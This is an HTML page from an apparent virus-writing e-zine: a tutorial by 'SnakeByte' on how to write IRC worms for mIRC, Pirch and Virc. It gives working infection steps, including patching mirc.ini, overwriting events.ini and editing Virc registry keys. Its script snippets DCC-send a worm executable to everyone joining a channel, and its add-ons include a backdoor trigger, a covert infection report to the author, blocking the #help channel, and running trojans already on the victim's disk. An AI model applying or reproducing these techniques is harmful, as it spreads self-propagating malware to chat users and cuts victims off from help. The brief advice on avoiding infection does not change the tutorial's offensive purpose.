<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="29.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="31.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - IRC WORMS - Theorie and code by SnakeByte</u></b>
<p>In this little tutorial I want to tell you some things about IRC worms,
<br>how to prevent infection and to write them.
<p>To be able to chat in the Internet Relay Chat (IRC) you need a client.
<br>This may be a Java Application on a web site or one of the more comfortable (and more
<br>powerful ;) clients you can get everywhere on the net. These clients are little programs
<br>(like mIRC,Virc,Pirch,Kvirc,..) which run on your PC and connects you to an IRC-Server
<br>or a net of several servers like the undernet. These clients offer us the possibility to
<br>change them and their behavior for our needs. The clients can configured and changed with
<br>a script language. Nearly every pseudo-hacking group offers you his own script, which are
<br>normally for mIRC. If you want to download a script you may have a look at www.mircx.com,
<br>which is a huge collection of several types of scripts. Every of these scripts has its 
<br>advantages and disadvantages. There are for example entertainment scripts, which allow us
<br>to play little games via IRC and war scripts, which make overtakes in channels easier.
<br>Nearly all Clients offer us the ability to send files to other chatters with the help
<br>of the dcc command. This gaves a clever person the idea to create the first IRC worm, which
<br>was designed for mIRC. This first worm was called Script.ini, because it only traveled with
<br>the help of this single file, which contains the scripts for an unconfigured mIRC.
<br>Due to the fact, that the preinstalled download folder for dccgets was the same like the
<br>folder which contained the script.ini the old script.ini gots overwritten, if someone
<br>accepted the dcc. When the new (wormy) script.ini gots loaded, you also started to dcc send
<br>the infected script.ini to everyone who joined a channel, where you talked. 
<br>The next worm, which got widely known was DM-Setup and his variants. This time it was no
<br>.INI file which traveled, it was an EXE-file which changed the INI file after execution.
<br>This worm was also designed for mIRC, because this is the most widely spread client.
<br>The most of the worms wait for the ON JOIN event to spred. So be aware if someone unknown 
<br>tries to dcc send you a file shortly after joining a new channel. Either you don't accept
<br>the file or scan it with an up-to-date virus scanner. 
<br>For you as IRC worm writer this mean to start searching for other events to spread your 
<br>worm or use the .timer command to send the file after a short delay. Other possible events
<br>are : dccsend, notify, query, text...
<p>Let's start with the interesting part:
<br>How to code an IRC-Worm ?
<br>It does not matter which language you choose to write the worm, all you have to take care
<br>of are the several clients, because the all differ a bit in they way you can infect them.
<br>But I don't care if you write in VB, ASM, TP or Wordmacro ;) .. (but I prefer asm ;)
<br>I don't want to write a tutor about all those different programming languages, I only want 
<br>to explain how to infect the different scripts. I think you will be easily able to do the
<br>other part with some programming experience with the language of your choice. But keep
<br>the file short (not as I did with NBC :P ) it shouldn't be greater than 40-50kb, because
<br>this makes the dcc take longer which makes the infected user more suspicious... 
<p>1.) mIRC - The most used Client, which also has the most scripts..
<br> Generally mIRC gets installed to 'c:\mirc\' or 'c:\MIRC32\'. This is the place where you
<br> find your victim. There are two possibilities to infect mIRC. Either you overwrite
<br> the 'script.ini' or another script file, or you patch the 'mirc.ini' and create a new
<br> file with your worm script. The first possibility is much easier, but it fails, if a more
<br> complex script is installed which does not use the script.ini. I prefer the second way which
<br> has the better choice of spreading. Thats why I will explain the second way now.
<br> You have to patch the file 'mirc.ini' at the section '[rfiles]' (why don't you have a look
<br> at this file with your notepad ? ;). There you have to add a new ini file or overwrite one
<br> of the existing. But note that the first two entries will not be used ( n1= and n2= )
<br> So change 'n3=OLDSCRIPT.ini' to 'n3=WORMSCRIPT.ini'. After this you have to create this
<br> new ini file. It has to start with '[Script]' (without the '' .. :P )
<br> and after this it has to contain the infectious script.. ok here is an example:
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;[Script]
<br>&nbsp;&nbsp;&nbsp;n0=on 1:join:#: { if ( $nick == $me ) halt
<br>&nbsp;&nbsp;&nbsp;n1=&nbsp;&nbsp;&nbsp; else /dcc send $nick C:\MIRC\WORM.EXE }
<br>&nbsp;&nbsp;&nbsp;n2=on 1:TEXT:leave!!!:#:{ /msg $chan Your will is my command
<br>&nbsp;&nbsp;&nbsp;n3=&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/part $chan }
<p> This script file has 4 lines, which I want to explain..
<br> line n0= : If someone joins a channel you are in, then it checks if you are the one
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; who joines the chan (you don't want to send the worm to yourself ;)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If you are the one it stops.
<br> line n1= : If not, it starts dcc sending the 'C:\MIRC\WORM.EXE'-worm to $nick, which
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; is the one who joined the channel.. This is all you need for spreading.. 
<br> line n2= : But we do not only want to spread.., :) heh virii-writers are evil :P (but not
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; destructive ..), we also want to open a little .. hmm lets say backdoor..
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If someone says the text 'leave!!!' to the channel, you will answer with
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'Your will is my command' and
<br> line n3= : part the channel.. :) ..
<p> If you need further instructions about mIRC and its scripting language, take a look 
<br> at the file 'mirc.hlp' which is offered with every mIRC client. But I will also speak about
<br> some Candies later in this tutorial.. :)
<p>2.) Pirch - Nice Client, which allows us to chat on several Servers at the same time
<p> Pirch is normally installed to 'C:\Pirch98\'. There is also the file 'events.ini' stored,
<br> which contains the script for Pirch. Pirch gets infected by replacing the original 
<br> 'events.ini' with a virulent one. Simply overwrite it..
<br> Let's have a look at an infected 'events.ini':
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[Levels]
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Enabled=1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Count=6
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Level1=000-Unknowns
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;000-UnknownsEnabled=1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Level2=100-Level 100
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100-Level 100Enabled=1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Level3=200-Level 200
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;200-Level 200Enabled=1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Level4=300-Level 300
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;300-Level 300Enabled=1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Level5=400-Level 400
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;400-Level 400Enabled=1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Level6=500-Level 500
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;500-Level 500Enabled=1
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[000-Unknowns]
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User1=*!*@*
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserCount=1
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Event1=ON JOIN:#:/dcc send $nick c:\Pirch98\worm.exe
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EventCount=1
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[100-Level 100]
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserCount=0
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EventCount=0
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[200-Level 200]
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserCount=0
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EventCount=0
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[300-Level 300]
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserCount=0
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EventCount=0
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[400-Level 400]
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserCount=0
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EventCount=0
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[500-Level 500]
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserCount=0
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EventCount=0
<br>&nbsp;
<br>&nbsp;
<br> This file is partet into several sections, the first contains general options, which you
<br> can easily figure out on your own .. :P .. If you can't stop reading this tutorial..
<br> The first section [000-Unkowns] contains the hostmask User1=*!*@*,
<br> and all users are in this hostmask, because it contains only wildcards.. :)
<br> UserCount shows us the number of hostmaks in this area .. 1 the wildcardmask.
<br> It would be stupid to add other users here, but it would be a nice side effekt to
<br> add your mask to level 500 and send you a msg when you join a channel .. :)
<br> But let's go back to our worm .. after the UserCount we set the event for all the useres
<br> with that 'specific' hostmask a dcc send, what else? Now we have to set the variable 
<br> EventCount .. This is 1 again .. There is only this single event needed to spread (as is told
<br> you before it is better to use another event..) 
<br> You want to know more about Pirch scripting? Come on, take a look at 'Pil.hlp' in your
<br> Pirch folder :)
<P>3.) Virc - My favourite, but the author stopped support :(
<p> The normal installation folder is 'C:\Virc\' and when the programm gets started the first
<br> time the script gets loaded (default.lib) and is saved in the windows registry.
<br> If you have the possibility to change the default.lib before it is loaded do so!
<br> But normally, the victim has started Virc at least once when it recieves the worm and
<br> executes it.
<br> Seems as if we have to work in the registry .. Ok why not.
<br> Start 'regedit' and have a look at it .. What do we find .. At
<br> 'Hkey_Users\.Default\Software\MeGALiTH Software\Visual IRC 96\Events\Event17'
<br> is our good old join event .. <g> .. Heh thats what we want for a simple worm.
<br> (No I will not list all events with their key here :P )
<br> Every Event is listened at this key .. There is an entry NAME at every EventXX
<br> where the original name of the event is saved.
<br> Ok, what will we have to patch now? Hmm .. VPL looks as if it contains script .. Right,
<br> we found our script. Just write here the entrie 'dcc send $nick C:\VIRC\WORM.EXE'
<br> Thats all you need for simple spreading with VIRC..
<br> Here you also get some information about Virc scripting delivered with the client.
<br> In the file 'vscript.txt' can curious coders find a lot of interesting things.
<p>4.) mIRC Xtrad - Sure Worms shall also make fun <EG>
<p> I will tell you here some things about nice add-ons for your worm, which you surely find
<br> interesting. I don't think that it will be too hard to change them a bit for the other
<br> clients, but I will show them only for mIRC .. Heh, I also have to do some other things 
<br> except tutorial writing ... :)
<p> The ON TEXT event is great for let an infected user look stupid in the channel ;)
<p> on 1:text:#:*idiot*:/say $chan I am stupid!!!
<p> What does this do? .. Someone says 'hello idiot' or another phrase that contains the 
<br> word idiot .. Just guess what the infected person answers .. :P
<p> Here comes a nice technique DMsetup used to keep the victims away of channels with
<br> users that could help them..
<p> on 1:Join:#:if $chan = #help /part $chan
<p> If the victim joins the #help channel it parts it instandly again .. ;)
<p> You want to know who is infected with your worm? .. Thats easy:
<p> on 1:connect:.msg MaStEr I am infected... 
<p> When the victim connects to a server it sends the one with the nick MaStEr a short message
<br> Heh whats that little . ? I thought it has to be a / ? .. No it has not .. The point executes
<br> the command secretly and the user is not noticed about it..
<p> Ok you want to inform the infected about the worm? Or scare him, that he belives he is
<br> 'hacked' ok .. Change the titlebar on an event you like .. AOL users are scared by this :)
<p> /titlebar *#*#*#*#*#*( You are lame )*#*#*#*#*#*#*
<p> Thats all you need .. :)
<p> Ok .. as i mentioned before there is a helpful command called timer:
<p> /timer1 60 /kick $me
<p> This sets a 60 seconds timer .. After the timer runs out the user kicks itself .. :) 
<br> Try this with 
<p> on 1:OP:#:.timer1 60 /kick $me IDIOT!!
<p> Hehe .. The victim kicks hisself 60 seconds after getting ops .. :)
<p> Another interesting command is 'run'. With /run <program> you can start programs located
<br> on the users HD. Try it with netscape to send him to a site you like .. Or if you know he
<br> has a trojan on his disk, run it!
<br> ( /run Netscape www.Kefrens.de )
<p>I hope you like this little tutorial and understand now how IRC worms work.
<br>If you have some replys, comments or criticism (I am thankful for every mail)
<br>then send it to SnakeByte@KryptoCrew.de
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;Cu soon SnakeByte
</body>
</html>